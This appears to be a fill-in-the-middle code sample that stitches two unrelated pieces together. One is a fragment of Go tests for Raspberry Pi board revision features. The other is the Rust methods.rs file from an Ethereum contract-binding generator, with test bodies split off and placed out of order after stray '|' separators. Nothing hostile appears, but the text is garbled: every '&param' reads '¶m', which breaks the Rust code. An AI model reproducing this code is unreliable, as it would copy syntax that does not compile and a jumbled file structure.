{0x9000c1, features{hdrP1P40: true, hdrHDMI: true}}, // boardZeroW
{0x920093, features{hdrP1P40: true, hdrHDMI: true}}, // boardZero
{0xa01040, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board2B
{0xa01041, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board2B
{0xa02082, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3B
{0xa020a0, features{hdrSODIMM: true}}, // boardCM3
{0xa020d3, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3BPlus
{0xa21041, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board2B
{0xa22042, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board2B
{0xa22082, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3B
{0xa32082, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3B
{0x900021, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1APlus
{0x900032, features{hdrP1P40: true, hdrAudio: true, hdrHDMI: true}}, // board1BPlus
{0x9020e0, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3APlus
{0x920092, features{hdrP1P40: true, hdrHDMI: true}}, // boardZero
{0x900061, features{}}, // boardCM1
{0xa220a0, features{hdrSODIMM: true}}, // boardCM3
{0xa52082, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3B
{0xa22083, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board3B
{0xa02100, features{hdrSODIMM: true}}, // boardCM3Plus
{0xa03111, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board4B
{0xb03111, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board4B
{0xc03111, features{hdrP1P40: true, hdrAudio: true, audioLeft41: true, hdrHDMI: true}}, // board4B
{0xc03130, features{hdrP1P40: true, hdrHDMI: true}}, // board400
}
for i, line := range data {
f := features{}
if err := f.init(line.v); err != nil {
t.Fatalf("#%d: unexpected failure for %#x: %v", i, line.v, err)
}
if line.f != f {
t.Fatalf("#%d: unexpected for %#x:\nexpected: %#v\nactual: %#v", i, line.v, line.f, f)
}
}
}
func TestFeaturesInitErr(t *testing.T) {
data := []uint32{
0x0,
0x1,
0x16,
}
for i, v := range data {
f := features{}
if err := f.init(v); err == nil {
t.Fatalf("#%d: unexpected success for %#x", i, v)
}
}
}
func TestDriver(t *testing.T) {
if v := drv.String(); v != "rpi" {
t.Fatal(v)
}
if v := drv.Prerequisites(); v != nil {
t.Fatal(v)
}
if v := drv.After(); !reflect.DeepEqual(v, []string{"bcm2835-gpio"}) {
t.Fatal(v)
}
}
| {
data := []uint32{0, 1, 0xa, 0xb, 0xc, 0x16}
for i, v := range data {
if _, err := parseRevision(v); err == nil {
t.Fatalf("#%d: unexpected success for %#x", i, v)
}
}
} |
methods.rs | use std::collections::BTreeMap;
use anyhow::{Context as _, Result};
use inflector::Inflector;
use proc_macro2::{Literal, TokenStream};
use quote::quote;
use syn::Ident;
use ethers_core::abi::ParamType;
use ethers_core::{
abi::{Function, FunctionExt, Param},
types::Selector,
};
use super::{types, util, Context};
/// Expands a context into a method struct containing all the generated bindings
/// to the Solidity contract methods.
impl Context {
/// Expands all method implementations
pub(crate) fn methods_and_call_structs(&self) -> Result<(TokenStream, TokenStream)> {
let aliases = self.get_method_aliases()?;
let sorted_functions: BTreeMap<_, _> = self.abi.functions.iter().collect();
let functions = sorted_functions
.values()
.map(std::ops::Deref::deref)
.flatten()
.map(|function| {
let signature = function.abi_signature();
self.expand_function(function, aliases.get(&signature).cloned())
.with_context(|| format!("error expanding function '{}'", signature))
})
.collect::<Result<Vec<_>>>()?;
let function_impls = quote! { #( #functions )* };
let call_structs = self.expand_call_structs(aliases)?;
Ok((function_impls, call_structs))
}
/// Expands to the corresponding struct type based on the inputs of the given function
fn expand_call_struct(
&self,
function: &Function,
alias: Option<&Ident>,
) -> Result<TokenStream> {
let call_name = expand_call_struct_name(function, alias);
let fields = self.expand_input_pairs(function)?;
// expand as a tuple if all fields are anonymous
let all_anonymous_fields = function.inputs.iter().all(|input| input.name.is_empty());
let call_type_definition = if all_anonymous_fields {
// expand to a tuple struct
expand_data_tuple(&call_name, &fields)
} else {
// expand to a struct
expand_data_struct(&call_name, &fields)
};
let function_name = &function.name;
let abi_signature = function.abi_signature();
let doc = format!(
"Container type for all input parameters for the `{}`function with signature `{}` and selector `{:?}`",
function.name,
abi_signature,
function.selector()
);
let abi_signature_doc = util::expand_doc(&doc);
let ethers_contract = util::ethers_contract_crate();
// use the same derives as for events
let derives = util::expand_derives(&self.event_derives);
Ok(quote! {
#abi_signature_doc
#[derive(Clone, Debug, Default, Eq, PartialEq, #ethers_contract::EthCall, #ethers_contract::EthDisplay, #derives)]
#[ethcall( name = #function_name, abi = #abi_signature )]
pub #call_type_definition
})
}
/// Expands all structs
fn expand_call_structs(&self, aliases: BTreeMap<String, Ident>) -> Result<TokenStream> {
let mut struct_defs = Vec::new();
let mut struct_names = Vec::new();
let mut variant_names = Vec::new();
for function in self.abi.functions.values().flatten() {
let signature = function.abi_signature();
let alias = aliases.get(&signature);
struct_defs.push(self.expand_call_struct(function, alias)?);
struct_names.push(expand_call_struct_name(function, alias));
variant_names.push(expand_call_struct_variant_name(function, alias));
}
let struct_def_tokens = quote! {
#(#struct_defs)*
};
if struct_defs.len() <= 1 {
// no need for an enum
return Ok(struct_def_tokens);
}
let ethers_core = util::ethers_core_crate();
let ethers_contract = util::ethers_contract_crate();
let enum_name = self.expand_calls_enum_name();
Ok(quote! {
#struct_def_tokens
#[derive(Debug, Clone, PartialEq, Eq, #ethers_contract::EthAbiType)]
pub enum #enum_name {
#(#variant_names(#struct_names)),*
}
impl #ethers_contract::AbiDecode for #enum_name {
fn decode(data: impl AsRef<[u8]>) -> Result<Self, #ethers_contract::AbiError> {
#(
if let Ok(decoded) = <#struct_names as #ethers_contract::AbiDecode>::decode(data.as_ref()) {
return Ok(#enum_name::#variant_names(decoded))
}
)*
Err(#ethers_core::abi::Error::InvalidData.into())
}
}
impl #ethers_contract::AbiEncode for #enum_name {
fn encode(self) -> Result<#ethers_core::types::Bytes, #ethers_contract::AbiError> {
match self {
#(
#enum_name::#variant_names(element) => element.encode()
),*
}
}
}
impl ::std::fmt::Display for #enum_name {
fn fmt(&self, f: &mut ::std::fmt::Formatter<'_>) -> ::std::fmt::Result {
match self {
#(
#enum_name::#variant_names(element) => element.fmt(f)
),*
}
}
}
#(
impl ::std::convert::From<#struct_names> for #enum_name {
fn from(var: #struct_names) -> Self {
#enum_name::#variant_names(var)
}
}
)*
})
}
/// The name ident of the calls enum
fn expand_calls_enum_name(&self) -> Ident {
util::ident(&format!("{}Calls", self.contract_name.to_string()))
}
/// Expands to the `name : type` pairs of the function's inputs
fn expand_input_pairs(&self, fun: &Function) -> Result<Vec<(TokenStream, TokenStream)>> {
let mut args = Vec::with_capacity(fun.inputs.len());
for (idx, param) in fun.inputs.iter().enumerate() {
let name = util::expand_input_name(idx, ¶m.name);
let ty = self.expand_input_param(fun, ¶m.name, ¶m.kind)?;
args.push((name, ty));
}
Ok(args)
}
/// Expands the arguments for the call that eventually calls the contract
fn expand_contract_call_args(&self, fun: &Function) -> Result<TokenStream> {
let mut call_args = Vec::with_capacity(fun.inputs.len());
for (idx, param) in fun.inputs.iter().enumerate() {
let name = util::expand_input_name(idx, ¶m.name);
let call_arg = match param.kind {
// this is awkward edge case where the function inputs are a single struct
// we need to force this argument into a tuple so it gets expanded to `((#name,))`
// this is currently necessary because internally `flatten_tokens` is called which
// removes the outermost `tuple` level and since `((#name))` is not
// a rust tuple it doesn't get wrapped into another tuple that will be peeled off by
// `flatten_tokens`
ParamType::Tuple(_) if fun.inputs.len() == 1 => {
// make sure the tuple gets converted to `Token::Tuple`
quote! {(#name,)}
}
_ => name,
};
call_args.push(call_arg);
}
let call_args = match call_args.len() {
0 => quote! { () },
1 => quote! { #( #call_args )* },
_ => quote! { ( #(#call_args, )* ) },
};
Ok(call_args)
}
fn expand_input_param(
&self,
fun: &Function,
param: &str,
kind: &ParamType,
) -> Result<TokenStream> {
match kind {
ParamType::Array(ty) => {
let ty = self.expand_input_param(fun, param, ty)?;
Ok(quote! {
::std::vec::Vec<#ty>
})
}
ParamType::FixedArray(ty, size) => {
let ty = self.expand_input_param(fun, param, ty)?;
let size = *size;
Ok(quote! {[#ty; #size]})
}
ParamType::Tuple(_) => {
let ty = if let Some(rust_struct_name) = self
.internal_structs
.get_function_input_struct_type(&fun.name, param)
{
let ident = util::ident(rust_struct_name);
quote! {#ident}
} else {
types::expand(kind)?
};
Ok(ty)
}
_ => types::expand(kind),
}
}
/// Expands a single function with the given alias
fn expand_function(&self, function: &Function, alias: Option<Ident>) -> Result<TokenStream> {
let name = alias.unwrap_or_else(|| util::safe_ident(&function.name.to_snake_case()));
let selector = expand_selector(function.selector());
// TODO use structs
let outputs = expand_fn_outputs(&function.outputs)?;
let ethers_contract = util::ethers_contract_crate();
let result = quote! { #ethers_contract::builders::ContractCall<M, #outputs> };
let contract_args = self.expand_contract_call_args(function)?;
let function_params = self
.expand_input_pairs(function)?
.into_iter()
.map(|(name, ty)| quote! { #name: #ty });
let function_params = quote! { #( , #function_params )* };
let doc = util::expand_doc(&format!(
"Calls the contract's `{}` (0x{}) function",
function.name,
hex::encode(function.selector())
));
Ok(quote! {
#doc
pub fn #name(&self #function_params) -> #result {
self.0.method_hash(#selector, #contract_args)
.expect("method not found (this should never happen)")
}
})
}
/// Returns the method aliases, either configured by the user or determined
/// based on overloaded functions.
///
/// In case of overloaded functions we would follow rust's general
/// convention of suffixing the function name with _with
// The first function or the function with the least amount of arguments should
// be named as in the ABI, the following functions suffixed with _with_ +
// additional_params[0].name + (_and_(additional_params[1+i].name))*
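// e.g. overloaded `foo(uint256)` and `foo(uint256, address spender)` expand to methods
// named `foo` and `foo_with_spender`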
fn get_method_aliases(&self) -> Result<BTreeMap<String, Ident>> {
let mut aliases = self.method_aliases.clone();
// find all duplicates, where no aliases where provided
for functions in self.abi.functions.values() {
if functions
.iter()
.filter(|f| !aliases.contains_key(&f.abi_signature()))
.count()
<= 1
{
// no conflicts
continue;
}
// sort functions by number of inputs asc
let mut functions = functions.iter().collect::<Vec<_>>();
functions.sort_by(|f1, f2| f1.inputs.len().cmp(&f2.inputs.len()));
let prev = functions[0];
for duplicate in functions.into_iter().skip(1) {
// attempt to find diff in the input arguments
let diff = duplicate
.inputs
.iter()
.filter(|i1| prev.inputs.iter().all(|i2| *i1 != i2))
.collect::<Vec<_>>();
let alias = match diff.len() {
0 => {
// this should not happen since functions with same name and input are
// illegal
anyhow::bail!(
"Function with same name and parameter types defined twice: {}",
duplicate.name
);
}
1 => {
// single additional input params
format!(
"{}_with_{}",
duplicate.name.to_snake_case(),
diff[0].name.to_snake_case()
)
}
_ => {
// 1 + n additional input params
let and = diff
.iter()
.skip(1)
.map(|i| i.name.to_snake_case())
.collect::<Vec<_>>()
.join("_and_");
format!(
"{}_with_{}_and_{}",
duplicate.name.to_snake_case(),
diff[0].name.to_snake_case(),
and
)
}
};
aliases.insert(duplicate.abi_signature(), util::safe_ident(&alias));
}
}
Ok(aliases)
}
}
fn expand_fn_outputs(outputs: &[Param]) -> Result<TokenStream> {
match outputs.len() {
0 => Ok(quote! { () }),
1 => types::expand(&outputs[0].kind),
_ => {
let types = outputs
.iter()
.map(|param| types::expand(¶m.kind))
.collect::<Result<Vec<_>>>()?;
Ok(quote! { (#( #types ),*) })
}
}
}
fn expand_selector(selector: Selector) -> TokenStream {
let bytes = selector.iter().copied().map(Literal::u8_unsuffixed);
quote! { [#( #bytes ),*] }
}
/// Expands to the name of the call struct
fn expand_call_struct_name(function: &Function, alias: Option<&Ident>) -> Ident {
let name = if let Some(id) = alias {
format!("{}Call", id.to_string().to_pascal_case())
} else {
format!("{}Call", function.name.to_pascal_case())
};
util::ident(&name)
}
/// Expands to the name of the call struct
fn expand_call_struct_variant_name(function: &Function, alias: Option<&Ident>) -> Ident {
let name = if let Some(id) = alias {
id.to_string().to_pascal_case()
} else {
function.name.to_pascal_case()
};
util::ident(&name)
}
/// Expands to the tuple struct definition
fn expand_data_tuple(name: &Ident, params: &[(TokenStream, TokenStream)]) -> TokenStream {
let fields = params
.iter()
.map(|(_, ty)| {
quote! {
pub #ty }
})
.collect::<Vec<_>>();
if fields.is_empty() {
quote! { struct #name; }
} else {
quote! { struct #name( #( #fields ),* ); }
}
}
/// Expands to the struct definition of a call struct
fn expand_data_struct(name: &Ident, params: &[(TokenStream, TokenStream)]) -> TokenStream {
let fields = params
.iter()
.map(|(name, ty)| {
quote! { pub #name: #ty }
})
.collect::<Vec<_>>();
quote! { struct #name { #( #fields, )* } }
}
#[cfg(test)]
mod tests {
use ethers_core::abi::ParamType;
use super::*;
// packs the argument in a tuple to be used for the contract call
fn expand_inputs_call_arg(inputs: &[Param]) -> TokenStream {
let names = inputs
.iter()
.enumerate()
.map(|(i, param)| {
let name = util::expand_input_name(i, ¶m.name);
match param.kind {
// this is awkward edge case where the function inputs are a single struct
// we need to force this argument into a tuple so it gets expanded to
// `((#name,))` this is currently necessary because
// internally `flatten_tokens` is called which removes the outermost `tuple`
// level and since `((#name))` is not a rust tuple it
// doesn't get wrapped into another tuple that will be peeled off by
// `flatten_tokens`
ParamType::Tuple(_) if inputs.len() == 1 => {
// make sure the tuple gets converted to `Token::Tuple`
quote! {(#name,)}
}
_ => name,
}
})
.collect::<Vec<TokenStream>>();
match names.len() {
0 => quote! { () },
1 => quote! { #( #names )* },
_ => quote! { ( #(#names, )* ) },
}
}
// converts the function params to name/type pairs
fn expand_inputs(inputs: &[Param]) -> Result<TokenStream> {
let params = inputs
.iter()
.enumerate()
.map(|(i, param)| {
let name = util::expand_input_name(i, ¶m.name);
let kind = types::expand(¶m.kind)?;
Ok(quote! { #name: #kind })
})
.collect::<Result<Vec<_>>>()?;
Ok(quote! { #( , #params )* })
}
#[test]
fn test_expand_inputs_call_arg() |
#[test]
fn expand_inputs_empty() {
assert_quote!(expand_inputs(&[]).unwrap().to_string(), {},);
}
#[test]
fn expand_inputs_() {
assert_quote!(
expand_inputs(
&[
Param {
name: "a".to_string(),
kind: ParamType::Bool,
internal_type: None,
},
Param {
name: "b".to_string(),
kind: ParamType::Address,
internal_type: None,
},
],
)
.unwrap(),
{ , a: bool, b: ethers_core::types::Address },
);
}
#[test]
fn expand_fn_outputs_empty() {
assert_quote!(expand_fn_outputs(&[],).unwrap(), { () });
}
#[test]
fn expand_fn_outputs_single() {
assert_quote!(
expand_fn_outputs(&[Param {
name: "a".to_string(),
kind: ParamType::Bool,
internal_type: None,
}])
.unwrap(),
{ bool },
);
}
#[test]
fn expand_fn_outputs_multiple() {
assert_quote!(
expand_fn_outputs(&[
Param {
name: "a".to_string(),
kind: ParamType::Bool,
internal_type: None,
},
Param {
name: "b".to_string(),
kind: ParamType::Address,
internal_type: None,
},
],)
.unwrap(),
{ (bool, ethers_core::types::Address) },
);
}
}
| {
// no inputs
let params = vec![];
let token_stream = expand_inputs_call_arg(¶ms);
assert_eq!(token_stream.to_string(), "()");
// single input
let params = vec![Param {
name: "arg_a".to_string(),
kind: ParamType::Address,
internal_type: None,
}];
let token_stream = expand_inputs_call_arg(¶ms);
assert_eq!(token_stream.to_string(), "arg_a");
// two inputs
let params = vec![
Param {
name: "arg_a".to_string(),
kind: ParamType::Address,
internal_type: None,
},
Param {
name: "arg_b".to_string(),
kind: ParamType::Uint(256usize),
internal_type: None,
},
];
let token_stream = expand_inputs_call_arg(¶ms);
assert_eq!(token_stream.to_string(), "(arg_a , arg_b ,)");
// three inputs
let params = vec![
Param {
name: "arg_a".to_string(),
kind: ParamType::Address,
internal_type: None,
},
Param {
name: "arg_b".to_string(),
kind: ParamType::Uint(128usize),
internal_type: None,
},
Param {
name: "arg_c".to_string(),
kind: ParamType::Bool,
internal_type: None,
},
];
let token_stream = expand_inputs_call_arg(¶ms);
assert_eq!(token_stream.to_string(), "(arg_a , arg_b , arg_c ,)");
} |